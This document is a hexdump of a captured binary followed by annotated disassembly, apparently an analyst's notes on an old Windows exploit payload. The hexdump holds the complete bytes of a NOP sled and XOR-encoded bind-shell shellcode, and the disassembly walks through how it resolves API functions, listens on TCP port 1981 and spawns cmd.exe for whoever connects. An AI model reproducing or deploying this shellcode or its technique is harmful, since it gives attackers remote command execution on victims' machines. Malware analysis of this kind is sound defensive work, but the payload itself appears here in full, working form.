hexdump -C /tmp/unknown/b7980587c10cfa4e0fd22d589546140e.bin
00000000 10 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |.'..............|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000000c0 00 00 00 00 00 00 00 00 00 00 00 00 00 90 90 90 |................|
000000d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000200 90 90 90 90 fb 7b ab 71 eb 10 5a 4a 33 c9 66 b9 |....û{«që.ZJ3Éf¹|
00000210 66 01 80 34 0a 99 e2 fa eb 05 e8 eb ff ff ff 70 |f..4..âúë.èëÿÿÿp|
00000220 99 98 99 99 c3 21 95 69 64 e6 12 99 12 e9 85 34 |....Ã!.idæ...é.4|
00000230 12 d9 91 12 41 12 ea a5 9a 6a 12 ef e1 9a 6a 12 |.Ù..A.ê¥.j.ïá.j.|
00000240 e7 b9 9a 62 12 d7 8d aa 74 cf ce c8 12 a6 9a 62 |ç¹.b.×.ªtÏÎÈ.Š.b|
00000250 12 6b f3 97 c0 6a 3f ed 91 c0 c6 1a 5e 9d dc 7b |.kó.Àj?í.ÀÆ.^.Ü{|
00000260 70 c0 c6 c7 12 54 12 df bd 9a 5a 48 78 9a 58 aa |pÀÆÇ.T.ßœ.ZHx.Xª|
00000270 50 ff 12 91 12 df 85 9a 5a 58 78 9b 9a 58 12 99 |Pÿ...ß..ZXx..X..|
00000280 9a 5a 12 63 12 6e 1a 5f 97 12 49 f3 9a c0 71 e5 |.Z.c.n._..Ió.Àqå|
00000290 99 99 99 1a 5f 94 cb cf 66 ce 65 c3 12 41 f3 9d |...._.ËÏfÎeÃ.Aó.|
000002a0 c0 71 f0 99 99 99 c9 c9 c9 c9 f3 98 f3 9b 66 ce |Àqð...ÉÉÉÉó.ó.fÎ|
000002b0 69 12 41 5e 9e 9b 99 9e 24 aa 59 10 de 9d f3 89 |i.A^....$ªY.Þ.ó.|
000002c0 ce ca 66 ce 6d f3 98 ca 66 ce 61 c9 c9 ca 66 ce |ÎÊfÎmó.ÊfÎaÉÉÊfÎ|
000002d0 65 1a 75 dd 12 6d aa 42 f3 89 c0 10 85 17 7b 62 |e.uÝ.mªBó.À...{b|
000002e0 10 df a1 10 df a5 10 df d9 5e df b5 98 98 99 99 |.ß¡.ߥ.ßÙ^ßµ....|
000002f0 14 de 89 c9 cf ca ca ca f3 98 ca ca 5e de a5 fa |.Þ.ÉÏÊÊÊó.ÊÊ^Þ¥ú|
00000300 f4 fd 99 14 de a5 c9 ca 66 ce 7d c9 66 ce 71 aa |ôý..Þ¥ÉÊfÎ}ÉfÎqª|
00000310 59 35 1c 59 ec 60 c8 cb cf ca 66 4b c3 c0 32 7b |Y5.Yì`ÈËÏÊfKÃÀ2{|
00000320 77 aa 59 5a 71 62 67 66 66 de fc ed c9 eb f6 fa |wªYZqbgffÞüíÉëöú|
00000330 d8 fd fd eb fc ea ea 99 da eb fc f8 ed fc c9 eb |Øýýëüêê.ÚëüøíüÉë|
00000340 f6 fa fc ea ea d8 99 dc e1 f0 ed c9 eb f6 fa fc |öúüêêØ.ÜáðíÉëöúü|
00000350 ea ea 99 d5 f6 f8 fd d5 f0 fb eb f8 eb e0 d8 99 |êê.ÕöøýÕðûëøëàØ.|
00000360 ee ea ab c6 aa ab 99 ce ca d8 ca f6 fa f2 fc ed |îê«Æª«.ÎÊØÊöúòüí|
00000370 d8 99 fb f0 f7 fd 99 f5 f0 ea ed fc f7 99 f8 fa |Ø.ûð÷ý.õðêíü÷.øú|
00000380 fa fc e9 ed 99 00 00 00 00 00 00 00 00 00 00 00 |úüéí............|
00000390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000410 00 00 6e 65 54 6d 61 4e 69 61 63 00 00 00 00 00 |..neTmaNiac.....|
00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000005d0 00 00 00 00 00 00 00 00 6e 65 74 6d 61 6e 69 61 |........netmania|
000005e0 63 20 77 61 73 20 68 65 72 65 00 00 00 00 00 00 |c was here......|
000005f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000006d0 00 00 00 00 00 00 00 00 00 00 00 00 31 32 2f 31 |............12/1|
000006e0 32 2f 30 34 20 31 33 3a 31 33 3a 31 33 00 00 00 |2/04 13:13:13...|
000006f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000ae0 00 00 00 00 00 00 00 00 00 00 00 00 6e 65 74 6e |............netn|
00000af0 69 6e 6a 61 7a 5f 70 6c 61 63 65 00 00 00 00 00 |injaz_place.....|
00000b00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000bf0 31 33 31 2e 31 33 31 2e 31 33 31 2e 31 33 31 00 |131.131.131.131.|
00000c00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000ef0 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 37 32 |............3.72|
00000f00 2e 30 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 |.0.0............|
00000f10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000fd0 00 00 00 00 00 00 00 00 00 f0 fd 7f 00 00 00 00 |.........ðý.....|
00000fe0 c7 42 e6 77 f0 00 40 00 ac f1 f8 0b 00 00 e6 77 |ÇBæwð.@.¬ñø...æw|
00000ff0 0c fd f8 0b 55 1f f8 77 80 31 f8 77 ff ff ff ff |.ýø.U.øw.1øwÿÿÿÿ|
00001000 30 fa f8 0b 07 31 f8 77 00 00 40 00 e8 9e e6 77 |0úø..1øw..@.è.æw|
00001010 00 00 40 00 ca 9e e6 77 00 00 00 00 c7 42 e6 77 |..@.Ê.æw....ÇBæw|
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000013e0 00 00 00 00 00 00 00 00 |........|
000013e8
00424A31 EB 10 JMP SHORT 722b3019.00424A43 00424A33 5A POP EDX 00424A34 4A DEC EDX 00424A35 33C9 XOR ECX,ECX 00424A37 66:B9 6601 MOV CX,166 00424A3B 80340A 99 XOR BYTE PTR DS:[EDX+ECX],99 00424A3F ^E2 FA LOOPD SHORT 722b3019.00424A3B
00424A41 EB 05 JMP SHORT 722b3019.00424A48 00424A43 E8 EBFFFFFF CALL 722b3019.00424A33 00424A48 E9 00010000 JMP 722b3019.00424B4D 00424A4D 5A POP EDX 00424A4E B8 0CF0FD7F MOV EAX,7FFDF00C 00424A53 8B00 MOV EAX,DWORD PTR DS:[EAX] 00424A55 8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C] ; GetProcAddress 00424A58 AD LODS DWORD PTR DS:[ESI] 00424A59 8B40 08 MOV EAX,DWORD PTR DS:[EAX+8] ; KERNEL32.77E70000 00424A5C 8BD8 MOV EBX,EAX 00424A5E 8B73 3C MOV ESI,DWORD PTR DS:[EBX+3C] 00424A61 03F3 ADD ESI,EBX 00424A63 8B76 78 MOV ESI,DWORD PTR DS:[ESI+78] ; KERNEL32.77EC4220 00424A66 03F3 ADD ESI,EBX 00424A68 8B7E 20 MOV EDI,DWORD PTR DS:[ESI+20] ; KERNEL32.77E7C4F3C 00424A6B 03FB ADD EDI,EBX 00424A6D 8B4E 14 MOV ECX,DWORD PTR DS:[ESI+14] 00424A70 33ED XOR EBP,EBP 00424A72 56 PUSH ESI 00424A73 57 PUSH EDI 00424A74 51 PUSH ECX 00424A75 8B3F MOV EDI,DWORD PTR DS:[EDI] 00424A77 03FB ADD EDI,EBX 00424A79 8BF2 MOV ESI,EDX 00424A7B 6A 0E PUSH 0E 00424A7D 59 POP ECX 00424A7E F3:A6 REPE CMPS BYTE PTR ES:[EDI],BYTE PTR DS:> 00424A80 74 08 JE SHORT 722b3019.00424A8A 00424A82 59 POP ECX 00424A83 5F POP EDI 00424A84 83C7 04 ADD EDI,4 00424A87 45 INC EBP 00424A88 ^E2 E9 LOOPD SHORT 722b3019.00424A73 ; function lookup loop 00424A8A 59 POP ECX 00424A8B 5F POP EDI 00424A8C 5E POP ESI 00424A8D 8BCD MOV ECX,EBP 00424A8F 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24] 00424A92 03C3 ADD EAX,EBX 00424A94 D1E1 SHL ECX,1 00424A96 03C1 ADD EAX,ECX 00424A98 33C9 XOR ECX,ECX 00424A9A 66:8B08 MOV CX,WORD PTR DS:[EAX] 00424A9D 8B46 1C MOV EAX,DWORD PTR DS:[ESI+1C] 00424AA0 03C3 ADD EAX,EBX 00424AA2 C1E1 02 SHL ECX,2 00424AA5 03C1 ADD EAX,ECX 00424AA7 8B00 MOV EAX,DWORD PTR DS:[EAX] 00424AA9 03C3 ADD EAX,EBX 00424AAB 8BFA MOV EDI,EDX 00424AAD 8BF7 MOV ESI,EDI 00424AAF 83C6 0E ADD ESI,0E 00424AB2 8BD0 MOV EDX,EAX 00424AB4 6A 03 PUSH 3 00424AB6 59 POP ECX 00424AB7 E8 7C000000 CALL 722b3019.00424B38 ; call GetProcAddress? 00424ABC 83C6 0D ADD ESI,0D 00424ABF 52 PUSH EDX 00424AC0 56 PUSH ESI 00424AC1 FF57 FC CALL DWORD PTR DS:[EDI-4] ; call LoadLibraryA ws2_32 00424AC4 5A POP EDX 00424AC5 8BD8 MOV EBX,EAX 00424AC7 6A 04 PUSH 4 00424AC9 59 POP ECX 00424ACA E8 69000000 CALL 722b3019.00424B38 00424ACF 50 PUSH EAX 00424AD0 50 PUSH EAX 00424AD1 50 PUSH EAX 00424AD2 50 PUSH EAX 00424AD3 6A 01 PUSH 1 00424AD5 6A 02 PUSH 2 00424AD7 FF57 F0 CALL DWORD PTR DS:[EDI-10] ; call WSASocketA 00424ADA 8BD8 MOV EBX,EAX 00424ADC C707 020007BD MOV DWORD PTR DS:[EDI],BD070002 ; BD07 <- port 1981 00424AE2 33C0 XOR EAX,EAX 00424AE4 8947 04 MOV DWORD PTR DS:[EDI+4],EAX 00424AE7 6A 10 PUSH 10 00424AE9 57 PUSH EDI 00424AEA 53 PUSH EBX 00424AEB FF57 F4 CALL DWORD PTR DS:[EDI-C] ; call bind 00424AEE 6A 01 PUSH 1 00424AF0 53 PUSH EBX 00424AF1 FF57 F8 CALL DWORD PTR DS:[EDI-8] ; call listen 00424AF4 50 PUSH EAX 00424AF5 50 PUSH EAX 00424AF6 53 PUSH EBX 00424AF7 FF57 FC CALL DWORD PTR DS:[EDI-4] ; call accept 00424AFA 83EC 44 SUB ESP,44 00424AFD 8BF4 MOV ESI,ESP 00424AFF 33DB XOR EBX,EBX 00424B01 6A 10 PUSH 10 00424B03 59 POP ECX 00424B04 891C8E MOV DWORD PTR DS:[ESI+ECX*4],EBX 00424B07 ^E2 FB LOOPD SHORT 722b3019.00424B04 00424B09 8946 38 MOV DWORD PTR DS:[ESI+38],EAX 00424B0C 8946 3C MOV DWORD PTR DS:[ESI+3C],EAX 00424B0F 8946 40 MOV DWORD PTR DS:[ESI+40],EAX 00424B12 C746 2C 01010000 MOV DWORD PTR DS:[ESI+2C],101 00424B19 8D47 10 LEA EAX,DWORD PTR DS:[EDI+10] 00424B1C 50 PUSH EAX 00424B1D 56 PUSH ESI 00424B1E 53 PUSH EBX 00424B1F 53 PUSH EBX 00424B20 53 PUSH EBX 00424B21 6A 01 PUSH 1 00424B23 53 PUSH EBX 00424B24 53 PUSH EBX 00424B25 C747 3C 636D6400 MOV DWORD PTR DS:[EDI+3C],646D63 00424B2C 8D47 3C LEA EAX,DWORD PTR DS:[EDI+3C] 00424B2F 50 PUSH EAX 00424B30 53 PUSH EBX 00424B31 FF57 E4 CALL DWORD PTR DS:[EDI-1C] ; call CreateProcessA 00424B34 50 PUSH EAX 00424B35 FF57 E8 CALL DWORD PTR DS:[EDI-18] ; call ExitProcess
